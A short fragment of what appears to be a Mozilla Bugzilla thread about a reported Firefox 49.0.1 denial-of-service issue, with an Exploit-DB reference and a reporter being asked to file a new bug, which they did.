Mozilla Firefox 49.0.1 - Denial of Service
#Date: 15 Oct 2016
https://www.exploit-db.com/exploits/40536/
Updated (Reporter) • 8 years ago
Flags: needinfo?(madperson)
Comment 30 • 8 years ago
Please file a new bug if you think you've found something new.
Flags: needinfo?(sultanalbalawi00)
Comment 31 • 8 years ago
(In reply to Marco Castelluccio [:marco] from comment #30)
> Please file a new bug if you think you've found something new.
I did
https://bugzilla.mozilla.org/show_bug.cgi?id=1314862
thanks
Updated • 8 years ago
Flags: needinfo?(sultanalbalawi00)